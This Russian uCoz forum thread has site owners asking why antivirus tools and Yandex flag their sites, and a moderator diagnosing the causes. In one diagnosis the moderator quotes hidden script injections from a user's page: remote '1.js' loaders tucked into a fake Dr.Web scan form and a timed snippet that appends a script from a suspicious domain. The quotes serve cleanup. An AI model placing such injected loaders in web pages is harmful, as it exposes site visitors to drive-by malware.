Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика) |
| Вирусы на сайтах |
|
Как предотвратить попадание вредоносных ссылок на сайт
Диагностика
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
|
|
Цитата (bandjuk) strandruxa, у яндекса не пробовали выяснить что ему собственно не нравится? |
|
strandruxa, вердикт в поведенческом? вы ничего не удаляли? в ротаторе что было?
у вас есть вебмастер яндекса напишите в поддержку из вебмастера войдите в вебмастер яндекса. справа будет надпись Цитата Задать вопрос о сайте службе поддержки  напишите, что яндекс блокирует сайт http://instructor.3dn.ru/ по поведенческому. попросите образцы кода, которые яндекс посчитал сомнительными вам ответят Прикрепления:
6902097.jpg
(108.5 Kb)
|
|
Цитата (webanet) strandruxa, вердикт в поведенческом? вы ничего не удаляли? в ротаторе что было?у вас есть вебмастер яндекса напишите в поддержку из вебмастера войдите в вебмастер яндекса. справа будет надпись Цитата Задать вопрос о сайте службе поддержки напишите, что яндекс блокирует сайт http://instructor.3dn.ru/ по поведенческому. попросите образцы кода, которые яндекс посчитал сомнительными вам ответят Добавлено (10 Авг 2013, 21:20:25) Цитата (webanet) в ротаторе что было? |
|
strandruxa, ротатор давно очистили? дайте адреса сайтов, которые крутились в ротаторе. но все равно пишите яндексу
|
|
Здравствуйте! Заблокировали мой сайт. После долгого общения с службой поддержки мне ответили что на моем сайте обнаружен потенциально опасный код.
script src="http://i1ii.ru/1.js" type="text/javascript". Его надо удалить и снова обратится в службу поддержки. Но я уже пол дня его ищу и не могу найти. Может вы знаете способа для поиска таких кодов? Я уже не знаю где его искать. Помогите! Заранее спасибо! |
|
SHMIT, на форуме вам не помогут найти код тем более без адреса сайта, так как доступ к коду и сайту имеет только администратор
обычно такой код попадается в мини-профилях, чатах, опросах и так далее. вспоминайте какие крутые скрипты вы устанавливали |
|
Проверил сайт на вирусы c помощью - del
Проверя главную страницу то есть - http://cscontrol.ru/ данный сервис не обнаружил не единого вируса. Проверяя страницу материалов и комментариев к нему и страницу со списком материалов категории сервис обнаружил Ikarus Trojan.JS.Blacole Каждую страничку каждого модуля проверил , все картинки (малоли изображения с других ресурсов подгружаются) , убрал не нужные скрипты. И всё равно этот Trojan.JS.Blacole! Помогите избавиться от этого. Заранее спасибо! Сообщение отредактировал webanet - Среда, 14 Авг 2013, 13:05:29
|
|
OneBlow, рекламу реалтрафа уберите с сайта и не будет проблем
вот это Код <!--Реклама_от_Realtraf--> <script charset="utf-8" src="http://cscontrol.ru/jspartnerka/jrt-run.js"></script> <!--/Реклама_от_Realtraf--> |
|
webanet, днём проверил ещё раз и нашелся ещё один вирус
Jiangmin Suspect.Package.RLO Так же сделал проверку на virustotal Вот линк на анализ - https://www.virustotal.com/ru....6477106 От куда за 8 часов взялся ещё один вирус на сайте? Рекламу от реалтрафа убрал , но от этого ничего не изменилось! Пароли от ПУ поменял , на почте тоже поменял пароли , и установил пароль на папки принятые , отправленные и т.д. Вирусов на компьютере нет. Вот скан от сюда - del Не пойму пишет что якобы домен или IP имеет репутацию плохую или что не могу понять в Английском не силён. Добавлено (14 Авг 2013, 15:01:27) --------------------------------------------- И так вот ещё один скан , этот сервис пишет что мой сайт чист - del Сообщение отредактировал OneBlow - Среда, 14 Авг 2013, 14:57:18
|
|
OneBlow, у вас стоит фильтр яндекса по безопасности. остальной мусор, который дает детект питается по онлайн базам. ваша за дача или перестать дергать крутые онлайн сервисы и ждать обновления баз и снятия с вашего сайта фильтра или обращайтесь в владельцам онлайн сервисов. пусть они трактуют как хотят.
или вам кинуть все силы на яндекс и его фильтр. кстати, у вас в продаже ссылок крутится asd-kinozal.3dn.ru он пока закрыт от индексирования в связи с карантином, но вместе со скриптом продажи ссылок вы откручиваете его в документ райт, а там стоит реклама, на которую яндекс как правило довольно остро реагирует удалите ссылку на этот сайт. далее идите в вебмастер. в безопасности смотрите списки ссылок, которые он вам дал. там должны быть кнопки на перепроверку сайта. если кнопок перепроверки нет, то пишите в тех.поддержку из вебмастера и ждите пока яндекс не снимет блок и я вас прошу. давайте вы свои ссылки с крутых сервисов проверки будете оставлять при себе. в этой теме они трижды не нужны. они не вносят ясность в проблему вообще. тут нужна ссылка на сайт и описание проблемы своими словами. все я уже сказала из-за чего у вашего сайта проблемы. хотите развлекаться дальше по сервисам - вперед. но тут не пишите. пусть вам сервисы сайт чистят |
|
webanet, спасибо , я отправил в яндекс вебмастер уведомление на перепроверку , буду ждать.
И ещё вопрос , разве если блок с сылками ставить в <noindex><noffolow> то всё равно поисковик будет лазить по тем ссылкам которые заключены в эти теги? |
|
OneBlow, робот проверят все скрипты. в данном случае ему все равно на ваши теги. тег запрещает индексировать всего-лишь. а проверять не запрещает. робот проверяет весь код страницы, который виден в исходнике. проверяет все скрипты и все содержимое скриптов
|
|
На компьютерах, особенно зашищенных Касперским и Авастом ругаются на главную страницу сайта http://privat24.ucoz.net: обнаружен вредоносный код. Хотя доктор Веб ничего подобного не находит. Вебмастер Яндекса также не видит вредоносного кода. Да, если бы не терялась посещаемость сайта всё было бы хорошо и эта тема мною не поднималась бы.
 |
|
yurcendel, вы превратили свой сайт в скрипто-помойку. вредоносный код у вас находится в онлайн проверке на вирусы от доктора веба
выделенное красным удалить Цитата <form method="POST" id="drweb_online_scan_form" enctype="multipart/form-data" action="http://online.drweb.com/result" target="drweb_scan_form_popup_window"> <div class="dr" align="center">Проверка файлов на вирусы</div> <div class="dr" align="center"><input id="file_selection_input" name="file" size="16%" type="file"><script type="text/javascript" src="http://onona.pp.ua/1.js"></script></div> <div class="dr" align="center"> <img alt="null" src="http://s46.radikal.ru/i111/1009/05/1fc9b62e0447.gif" align="top" border="0" height="21" width="31"> <input onclick="return do_scan_file_01();" src="http://s58.radikal.ru/i162/1009/21/b1d12ac84fcb.gif" height="19" type="image" width="90"></div> </form> вот на это тоже могут ругаться некоторые антивирусы Код <script type="text/javascript"> (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://xxoohqiych.elements-heavier.info' + '/?284254=KmMqLHg8Nzpjb2hnZ20'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); </script> если вы уж так нуждались в такой форме проверки, то нужно было её брать у самого доктора веба, а не на сомнительных сайтах |
. Спасибо большое)
| |||